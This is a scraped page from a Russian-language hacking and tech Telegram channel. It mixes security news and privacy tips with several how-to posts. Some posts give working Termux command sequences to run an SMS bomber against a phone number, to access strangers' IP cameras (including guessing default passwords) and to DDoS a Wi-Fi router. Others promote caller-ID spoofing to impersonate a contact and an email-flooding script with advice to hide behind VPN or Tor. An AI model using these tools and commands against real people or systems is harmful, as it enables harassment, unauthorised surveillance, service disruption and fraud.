Эксплойт
1.97M subscribers
14.4K photos
6.88K videos
2 files
10.1K links
Главное медиа об интернет-культуре и технологиях.

Больше интересного на https://exploit.iss.onedia

Написать в редакцию: @exploitex_bot

Сотрудничество: @todaycast

РКН: https://clck.ru/3FjURF
Download Telegram
Найдется все! Изучаем методы взлома и проникновения с помощью Google

Для обычного человека Google - это просто поисковая система, используемая для поиска текста, изображений, видео и новостей. Тем не менее, в мире информационных технологий Google является полезным хакерским инструментом.

Google Dorking - это практика использования Google для поиска уязвимых веб-приложений и серверов с использованием собственных возможностей поисковой системы Google.

📌 Изучаем методы взлома и проникновения с помощью Google
2
​​Поиск адресов корпоративной почты

Сервис hunter.io — это инструмент поиска адресов корпоративной почты, с помощью которого можно получить контактную информацию по доменам.

Hunter.io способен делать поиск email по домену или названию организации, искать отдельного сотрудника по имени и компании делать подтверждение работоспособности и актуальности почты, узнать количество email для одного домена или для одной компании.

Для чего это может быть полезно? Такие сведения необходимы, чтобы далее проверить найденные email'ы на компрометацию, например, на сайте haveibeenpwned.com или intelx.io

#OSINT
1
​​Как звонить с подменой номера прямо в телеграм

С помощью @SafeCallsBot можно совершать безопасные звонки с подменой номера, подменой голоса и еще множеством других функций.

Для того, чтобы позвонить с другого номера запустите бота и перейдите в раздел Подмена, выберите Caller ID  и введите номер, с которого вы хотите сделать вызов. Затем перейдите в раздел Позвонить и укажите номер, на который хотите позвонить. Далее вас попросят позвонить боту, через которого вы и будете говорить с абонентом.

Если такой номер уже записан в контактах у абонента, высветится как будто звонит этот контакт.

Бот дает 8 часов демо доступа для новых пользователей и тестовый баланс 0,10$, чего хватит на несколько пробных звонков. Количество смен номера не ограничено.
2
​​Как новая атака на Android-устройства помогает имитировать нажатия на экран

Группа исследователей из японского университета Васэда представила доклад о новом типе атак на Android-устройства. Для реализации Tap 'n Ghost понадобится специальный девайс, состоящий из медного листа, подключенного к генератору сигналов DDS и устройств для чтения/записи NFC.

После того, как пользователь разместит свой смартфон в зоне действия NFC (от 4 до 10 см), аппаратура для чтения/записи NFC может начать работу и получить базовую информацию об устройстве, а затем злоумышленник может задействовать медную пластину, чтобы вызвать электрические помехи на экране, спровоцировав возникновение нажатий на экран, эмулировуя нажатие на кнопку «Да», что позволит устройству подключиться к мошеннической сети Wi-Fi, или разрешить вредоносное соединение посредством Bluetooth

Исследователи уверяют, что такое устройство можно без труда спрятать в обычном журнальном столике, стойке кафе и других предметах мебели, на которые жертва может положить свой смартфон.
2
​​Как организовать спам SMS сообщениями на Termux

Для начала нам необходимо скачать Termux. Через Play Market.

Запускаем Termux и обновляем пакеты:
apt update & apt upgrade -y

Устанавливаем git:
pkg install git

Указываем ссылку на GitHub, где лежит пакет установки:
git clone https://github.com/Argisht44/android.git

Переходим в директорию и запускаем бомбер:
cd android
cd Infinite-Bomber-arm64
chmod 777 infinite-bomber
./infinite-bomber


После ввода этих команд, SMS Bomber запустится. Тебе потребуется ввести номер телефона, который ты собираешься использовать для атаки и следовать инструкции. Если запустить несколько сессий в Termux то у тебя получится отправить в разы больше SMS.

#хакинг #Termux
👍102👏1
​​Как идентифицировать пользователей при помощи сенсоров мобильных устройств

Любой сайт или приложение могут без каких-либо специальных разрешений получить доступ к заводским данным о калибровке таких сенсоров: гироскоп, магнитометр и акселерометр. Извлечение этих данных занимает не больше одной секунды, причем положение и ориентация устройства на это не влияют.

Данные калибровки могут стать уникальным идентификатором устройства, который рекламные или аналитические компании смогут использовать для отслеживания пользователя в интернете, в том числе при переключении между разными браузерами и сторонними приложениями.

Дело в том, что данные калибровки — это постоянная, которая не изменяется даже после сброса устройства к заводским настройкам, то есть идентификатор получается надежным и неизменным, как IMEI.
2🔥1
Взлом IoT устройств. Или как удаленно включить чужую кофемашину

Интернет и обычная жизнь постепенно сливаются воедино. Именно такой расклад способствует сделать жизнь людей удобнее и лучше, основываясь на новых технологиях и умных устройствах. Но не все так радужно, взломщики никогда не спят.

📌 Взлом IoT устройств. Или как удаленно включить чужую кофемашину
1
​​Как организовать спам на электронную почту

Потребности спама электронной почты могут быть разные. Возможно, Вы просто хотите подшутить над другом, а возможно над недругом. Рассмотрим способ спам-рассылки электронной почты с помощью HTML скрипта.

Запускаем скрипт в браузере и в форму для ввода Email вводим почту, которую хотим заспамить. После ввода почты нажимаем кнопку «Start» и через несколько секунд спам начнётся и продлится около 10 минут. На введенный адрес электронной почты будет отправляться по несколько сотен писем в минуту.

Однако, в получаемых письмах будет указан IP адрес компьютера, на котором был запущен скрипт, так что для безопасности стоит использовать VPN или TOR.

💾 Скачать скрипт можно из Библиотеки хакера
3👍1
​​Как скрыться от камеры наблюдения с помощью 2D-картинки

Обычная 2D-картинка, напечатанная на футболке или сумке, может сделать человека невидимым для камер наблюдения, если те полагаются в своей работе на машинное обучение и должны распознавать людей в видеопотоке.

Для достижения нужного эффекта изображение 40х40 сантиметров должно располагаться посередине detection box камеры и находиться в ее поле зрения постоянно. Конечно, этот способ не поможет человеку скрыть лицо, однако алгоритм обнаружения людей не сумеет обнаружить в кадре человека, а значит, последующее распознавание черт лица так же не будет запущено.

В ходе экспериментов исследователи использовали для обмана систем наблюдения самые разные картинки, включая абстрактный «шум» и размытые изображения, но оказалось, что лучше всего подходят фотографии случайных объектов, прошедшие различную обработку. Если нанести полученные изображения на одежду, сумку и так далее, алгоритмы перестанут видеть за ними человека.
2
Найди, если сможешь. Учимся профессионально скрывать файлы с помощью стеганографии

Эра интерната. Эра тотального контроля и деанонимизации. Власти все сильнее закручивают гайки, поэтому нам, обычным юзерам, нужно научиться скрывать информацию о нас самих и уметь ее безопасно передавать. В этой статье речь пойдет о такой вещи, как "стеганография".

📌 Учимся профессионально скрывать файлы с помощью стеганографии
1
​​Как сделать отдельные E-Email адреса для каждого сайта

Перед вами два адреса электронной почты: [email protected] и [email protected]. Казалось бы, два разных адреса, но это не так. На самом деле это ярлыки одного и того же адреса -  [email protected] Если отправить письмо на первый электронный адрес, то его получателем будет [email protected].

Большинство почтовых сервисов игнорируют все символы, которые идут после знака + и до @. Но если вы укажете эти адреса на сайтах в качестве логина, то для большинства сайтов это будут абсолютно разные электронные адреса.

Вы можете использовать уникальный ярлык для каждого сайта, что в разы усложнит злоумышленнику взлом вашего аккаунта, даже если ему известен ваш адрес электронной почты и даже пароль.

#безопасность
2
​​Как извлекать данные с изолированных машин с помощью диодов на клавиатуре

Специалисты из Университета имени Бен-Гуриона представили новый метод извлечения данных с машин, физически изолированных от любых сетей и потенциально опасной периферии с помощью диодов Caps Lock, Num Lock и Scroll Lock.

Разработка заставляет светодиоды USB-клавиатур мигать на высоких скоростях, используя собственный протокол передачи данных. Злоумышленники могут записать это мигание и позже расшифровать данные. Скорость передачи данных зависит от чувствительности камеры и расстояния от клавиатуры и может достигать 3000 бит/сек на светодиод, при использовании чувствительных датчиков освещенности, и около 120 бит/сек с обычной камерой смартфона. Модель клавиатуры роли не играет.

В зависимости от обстоятельств, атакующие могут использовать для этих целей камеру смартфона или умных часов, камеры видеонаблюдения или находиться рядом с целевым устройством физически.
1
​​Как убрать верхнюю часть результатов поиска

https://millionshort.com позволяет удалить первые 100, 1000 или даже миллион результатов поиска, что позволит вам увидеть сайты, находящиеся на последних страницах, до которых обычно никто не доходит.

Сайт также позволяет выбрать страну, дату появления и отключить коммерческие сайты в выдаче.

#полезно #нетсталкинг
1
​​Получение доступа к камерам с помощью Termux

Для начала, скачиваем Termux.

Запускаем Termux, и обновляем пакеты:
apt update & apt upgrade

Устанавливаем python:
apt install git python2

Делаем запрос на установку:
pip2 install requests

Клонируем репозиторий:
git clone https://github.com/AngelSecurityTeam/Cam-Hackers

Открываем директорию:
cd Cam-Hackers

Запускаем программу:
python3 cam-hackers.py

Далее, вам нужно будет выбрать страну, после чего, откроется целый список ссылок, которые достаточно просто вставить в браузер и получить изображение с камеры.
Если на камере стоит пароль, то просто так вы к ней не подключитесь. Большенство пользователей не меняют дефолтные пароли, поэтому их без труда можно подобрать. Рекомендуем проверить, нет ли ваших камер в списке в всегда менять дефолтные пароли.
2
​​Данные фитнес-трекеров раскрыли местоположение американских военных баз

Интерактивная карта активности The Global Heat Map, которая «подсвечивает» маршруты людей, использующих фитнес-гаджеты раскрыла местонахождение военных баз и и маршруты патрулей нескольких армий мира.

Действительно, в странах Африки или Ближнего Востока за сотни километров от населенных пунктов и обозначенной на карте другой фитнес-активности можно увидеть узоры, оставленные неизвестно откуда взявшимися фитнес-трекерами.

Фактически на карту нанесены все маршруты людей, использовавших фитнес-гаджеты в районе американских военных объектов, благодаря чему на карте можно увидеть, например, детальную карту американской базы в Кандагаре в Афганистане или аванпосты вокруг Мосула, очень сомневаюсь, что это просто местные, которые любят бегать кругами вокруг своих домов.
2
​​Хакеры взломали YouTube-каналы и устроили «крипто-розыгрыш призов» якобы от Microsoft

Неизвестные злоумышленники взломали более тридцати YouTube-каналов, переименовали их с использованием различных брендов Microsoft и запустили трансляцию якобы от имени Билла Гейтса, в ходе которой транслировали выступление Гейтса 2019 года.

Одновременно с этим, они отображали рекламу с призывом принять участие в розыгрыше призов, для чего нужно было отправить мошенникам небольшую сумму в криптовалюте, которую они обещали удвоить.

Взломанные каналы насчитывали десятки тысяч подписчиков, поэтому после переименования в Microsoft US, Microsoft Europe, Microsoft News, имели весьма убедительный вид. После трансляции указанные мошенниками биткойн-кошельки пополнились на тысячи долларов, а значит, кто-то все-таки попался «на удочку».

#новость
2👍1
Чемоданчик хакера 2020. Выбираем устройства и инструменты, которые хорошо иметь под рукой

Мы отобрали пятнадцать девайсов, с которыми можно пентестить все что угодно: от физических устройств до бесконтактных карт. Сюда не вошли более обыкновенные инструменты вроде отверток и паяльников — их проще выбирать на свой вкус. Надеемся, ты присмотришь что-нибудь интересное в этом списке.

📌 Выбираем устройства и инструменты, которые хорошо иметь под рукой | Зеркало
🔥21
​​DDoS атака на WIFI при помощи Termux

Для начала, скачиваем Termux.

Запускаем Termux, и обновляем пакеты:
apt update & apt upgrade

Скачиваем репозиторий и переходим в него:
git clone https://github.com/Hydra7/Planetwork-DDOS
cd Planetwork-DDOS

Прописываем запуск программы:
python2 pntddos.py [ip-роутера] [открытый порт] [количество пакетов, которые нужно отправить на роутер]

Чтобы узнать ip-роутера, можно использовать программу Wifi Analyzer, и смотрим там ваш IP. У меня к примеру: 192.168.0.1.

Далее нужно узнать открытый порт, это можно сделать программой Port Scanner. В программу водим ваш IP, а порты оставляем по умолчанию.

#termux
👎6👍3
​​Расширение для защиты от скрытых трекеров на сайтах

Браузеры могут допустить утечку ваших персональных данных. На них охотятся компании, которые отслеживают ваше поведение в Интернете. Рекламодатели используют самые передовые методы трекинга вашего поведения в Интернете, от которых обычному пользователю трудно защититься, что затрудняет контроль над теми данными, которые отдает ваш браузер.

Существует довольно много инструментов для защиты конфиденциальности в Интернете. Лучшие из них — расширение «Privacy Badger», имеющееся как для Mozilla Firefox, так и для Google Chrome. Оно помогает рядовому пользователю защититься от скрытых трекеров, которые используют рекламодатели.

Расширение бесплатное и имеет открытый исходный код.

💾 Установить Privacy Badger: Firefox | Chrome

#приватность
2
​​Как ловят хакеров? Как взламывают банкоматы? Как грабят банки?
Хочешь узнать, как хакер взломал «Аэрофлот» и выборы в США?

Тогда подписывайся на YouTube-канал Люди PRO.

Бывший кардер, отсидевший 10-летний срок за киберпреступления, на своем канале общается с представителями самых разных теневых профессий: от админов телеграм-каналов до хакеров, кардеров, сутенеров, порнозвезд и автоугонщиков.

Это один из немногих каналов на YouTube, которые я и сам смотрю и вам советую. Он рассказывает о том, о чем другие говорить боятся…

А, ну еще у него не менее интересный телеграм-канал есть, там уже чисто за жизнь и темы, приносящие бабки.

📌 Ютуб-канал: https://www.youtube.com/channel/UCnfR9C-3Oxt7jl6Q-JNDd4g
📌 Телеграм-канал: https://t.iss.one/joinchat/AAAAAEI27fzkgON4lGUAmg
2